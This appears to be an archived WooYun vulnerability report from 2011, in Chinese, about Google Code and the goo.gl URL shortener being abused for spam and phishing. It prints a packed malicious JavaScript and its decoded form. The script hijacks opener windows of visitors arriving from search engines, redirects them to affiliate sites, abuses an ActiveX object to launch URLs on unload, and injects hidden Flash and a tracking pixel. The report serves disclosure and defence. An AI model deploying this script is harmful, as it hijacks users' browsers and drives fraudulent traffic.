乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2011-02-15: 积极联系厂商并且等待厂商认领中,细节不对外公开 2011-02-15: 厂商已经主动忽略漏洞,细节向公众公开
Google的一些互联网业务,包括Google Code和Google短网址服务被恶意钓鱼和垃圾广告利用
http://bijioc.googlecode.com/svn/trunk/js/navigatenormal.js?v=TueFeb152011.js
var urlarr = ["http://goo.gl/NZZl", "http://goo.gl/2bEs"];
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 1j=Z 2e("(9.F.3)|(9.1b.q)|(9.1b.1g)|(9.2f.3)|(X.q.12.3)|(X.12.3)|(2i.1p.q)|(1k.1p.q)|(X.2b.26.q)|(1k.3)|(9.25.3)|(9.24.3)|(9.27.3)|(28.3)|(9.2a.3)|(29.F.3)|(m.F.3)|(F.2j)|(2k.3)|(2u.3)|(2t.3)|(2v.3)|(2w.3)","i");4("A"==G(I))I="2y";4("A"==G(1c))1c=2x;6 2=[];6 n=v;a{4(H&&H.f&&H.5.2s("2r")){n=H}}g(e){}2.Y=[["8://9.2l.3/?2n=2o",23],["8://p.2q.3/c?s=2p&w=2z&c=1W&i=1M&l=0&e=&t=8://9.1L.3/1O.1P",1K]];2.1i=h(){a{6 R=["8://S.T/1F","8://S.T/1G"];4(5.k){2.Q.1J(R[1H(1I.1Q()*R.J)]);2.Q=13;1Y.1Z()}}g(e){}};2.1d=h(){a{4(5.k&&"A"==G(21)){2.Q=5.18("<E y=0 o=0 1r=\'1S:1T-1V-22-1X-1N\'></E>");v.k("20",2.1i)}}g(e){}};2.1o=V;2.W=V;2.U=h(j){a{n.r.r.1e(j)}g(e){a{n.r.1e(j)}g(2J){a{n.r.1f=j}g(2A){2.1d();2.W=1n}}}};2.O=h(j){4(2.Y.J>0){6 P=2.Y.3f();2.U(P[0]);4(!2.W){1a("2.O(\'"+j+"\')",P[1])}}u{2.U(j)}};2.M=h(){6 N="8://3h.1g.3i/3d.3c?s="+I;4(5.k){N+="&c="+v.1f.37}2.O(N)};4(n.r){4(1j.3b(n.5.3a)){2.1o=1n;4("A"==G(1m)){2.M()}u 4("3n"==1m){}u{2.M()}}}2.1E=h(1q){6 L=5.10.1l("; ");3o(6 i=0;i<L.J;i++){6 K=L[i].1l("=");4(1q==K[0])19 2L(K[1])}19""};2.1u=h(11){D=Z 2I();D.2H(D.2C()+15);5.10="1C="+2D(11)+"; 2G="+D.2P()+";2Q=/"};2.C=h(){4(5.1s==13){1a(2.C,31)}u{6 d=5.18("33");d.B.y="0";d.B.o="0";d.B.2Y="2X";d.B.2S="-2R";6 z="8://17.14.3/16/1h/1A/1B.1D";a{4(!5.k&&(2T.2U.2W("2V")>-1)){z="8://17.14.3/16/1h/1A/1B.1D?b=32"}}g(e){}d.1v=\'<E 1r="2Z:30-2F-2E-2B-2N" 2O="8://2M.1x.3/35/1w/2K/1t/34.3m#3r=7,0,0,0" y="0" o="0"><3p 3q="3k" 3l="\'+z+\'" /><39 1y="\'+z+\'" y="0" o="0" 38="36/x-1w-1t" 3j="8://9.1x.3/3g/3e" /></E>\';6 1z=2.1E("1C");4("1"!=1z){d.1v+="<1U 1y=\'8://S.T/1R\' y=\'0\' o=\'0\' 2m=\'0\'/>";2.1u("1")}5.1s.2c(d)}};a{4(5.k){v.k("2h",2.C)}u{v.2g("2d",2.C,V)}}g(e){}',62,214,'||_bijioc|com|if|document|var||http|www|try|||node|||catch|function||lochref|attachEvent|||_win|height||cn|opener|||else|window|||width|fp|undefined|style|appendpiece|date|object|baidu|typeof|parent|_jdcustomize|length|aCrumb|aCookie|justnavigate|urlr|navigateToUrl|nf|pnode|urlarr|goo|gl|navigateIt|false|hb|search|nHref|new|cookie|sValue|yahoo|null|googlecode||svn|bijioc|createElement|return|setTimeout|google|_jdcid|navigatePower|navigate|location|co|trunk|powerboom|_searchSites|bing|split|_lochref|true|ho|118114|sName|classid|body|flash|setcookie|innerHTML|shockwave|macromedia|src|_co|flv|broadpage|oc_biji|swf|getcookie|NZZl|2bEs|parseInt|Math|launchURL|600|vipshop|2882|00C04F79FAA6|index|php|random|CLEC|CLSID|6BF52A52|img|394A|4018|B153|self|focus|onunload|_nonapower|11D3|800|sogou|soso|vnet|taobao|gougou|cache|gouwo|114|appendChild|load|RegExp|youdao|addEventListener|onload|114search|asp|hao123|vancl|border|source|josion|788e4edd|yiqifa|fulliframe|getElementById|114la|265|115|etao|10011813|normal|148042|e3|96b8|getMinutes|escape|11cf|ae6d|expires|setMinutes|Date|e2|cabs|unescape|fpdownload|444553540000|codebase|toGMTString|path|100px|left|navigator|userAgent|Firefox|indexOf|absolute|position|clsid|d27cdb6e|200|ff|DIV|swflash|pub|application|host|type|embed|referrer|test|html|gomall|getflashplayer|shift|go|ocbiji|cc|pluginspage|movie|value|cab|donotnavigate|for|param|name|version'.split('|'),0,{}))
转换后
var _searchSites = new RegExp("(www.baidu.com)|(www.google.cn)|(www.google.co)|(www.youdao.com)|(search.cn.yahoo.com)|(search.yahoo.com)|(114search.118114.cn)|(bing.118114.cn)|(search.114.vnet.cn)|(bing.com)|(www.soso.com)|(www.sogou.com)|(www.taobao.com)|(gougou.com)|(www.gouwo.com)|(cache.baidu.com)|(m.baidu.com)|(baidu.asp)|(hao123.com)|(265.com)|(114la.com)|(115.com)|(etao.com)", "i");if ("undefined" == typeof(_jdcustomize)) _jdcustomize = "normal";if ("undefined" == typeof(_jdcid)) _jdcid = 10011813;var _bijioc = [];var _win = window;try { if (parent && parent.f && parent.document.getElementById("fulliframe")) { _win = parent }} catch (e) {}_bijioc.nHref = [ ["http://www.vancl.com/?source=josion", 800], ["http://p.yiqifa.com/c?s=788e4edd&w=148042&c=4018&i=2882&l=0&e=&t=http://www.vipshop.com/index.php", 600]];_bijioc.powerboom = function () { try { var urlarr = ["http://goo.gl/NZZl", "http://goo.gl/2bEs"]; if (document.attachEvent) { _bijioc.pnode.launchURL(urlarr[parseInt(Math.random() * urlarr.length)]); _bijioc.pnode = null; self.focus() } } catch (e) {}};_bijioc.navigatePower = function () { try { if (document.attachEvent && "undefined" == typeof(_nonapower)) { _bijioc.pnode = document.createElement("<object width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'></object>"); window.attachEvent("onunload", _bijioc.powerboom) } } catch (e) {}};_bijioc.ho = false;_bijioc.hb = false;_bijioc.navigateIt = function (lochref) { try { _win.opener.opener.navigate(lochref) } catch (e) { try { _win.opener.navigate(lochref) } catch (e2) { try { _win.opener.location = lochref } catch (e3) { _bijioc.navigatePower(); _bijioc.hb = true } } }};_bijioc.navigateToUrl = function (lochref) { if (_bijioc.nHref.length > 0) { var nf = _bijioc.nHref.shift(); _bijioc.navigateIt(nf[0]); if (!_bijioc.hb) { setTimeout("_bijioc.navigateToUrl('" + lochref + "')", nf[1]) } } else { _bijioc.navigateIt(lochref) }};_bijioc.justnavigate = function () { var urlr = "http://ocbiji.co.cc/gomall.html?s=" + _jdcustomize; if (document.attachEvent) { urlr += "&c=" + window.location.host } _bijioc.navigateToUrl(urlr)};if (_win.opener) { if (_searchSites.test(_win.document.referrer)) { _bijioc.ho = true; if ("undefined" == typeof(_lochref)) { _bijioc.justnavigate() } else if ("donotnavigate" == _lochref) {} else { _bijioc.justnavigate() } }}_bijioc.getcookie = function (sName) { var aCookie = document.cookie.split("; "); for (var i = 0; i < aCookie.length; i++) { var aCrumb = aCookie[i].split("="); if (sName == aCrumb[0]) return unescape(aCrumb[1]) } return ""};_bijioc.setcookie = function (sValue) { date = new Date(); date.setMinutes(date.getMinutes() + 15); document.cookie = "oc_biji=" + escape(sValue) + "; expires=" + date.toGMTString() + ";path=/"};_bijioc.appendpiece = function () { if (document.body == null) { setTimeout(_bijioc.appendpiece, 200) } else { var node = document.createElement("DIV"); node.style.width = "0"; node.style.height = "0"; node.style.position = "absolute"; node.style.left = "-100px"; var fp = "http://bijioc.googlecode.com/svn/trunk/flv/broadpage.swf"; try { if (!document.attachEvent && (navigator.userAgent.indexOf("Firefox") > -1)) { fp = "http://bijioc.googlecode.com/svn/trunk/flv/broadpage.swf?b=ff" } } catch (e) {} node.innerHTML = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="0" height="0"><param name="movie" value="' + fp + '" /><embed src="' + fp + '" width="0" height="0" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></object>'; var _co = _bijioc.getcookie("oc_biji"); if ("1" != _co) { node.innerHTML += "<img src='http://goo.gl/CLEC' width='0' height='0' border='0'/>"; _bijioc.setcookie("1") } document.body.appendChild(node) }};try { if (document.attachEvent) { window.attachEvent("onload", _bijioc.appendpiece) } else { window.addEventListener("load", _bijioc.appendpiece, false) }} catch (e) {}
增加业务的检查,避免被恶意利用
未能联系到厂商或者厂商积极拒绝
漏洞Rank:3 (WooYun评价)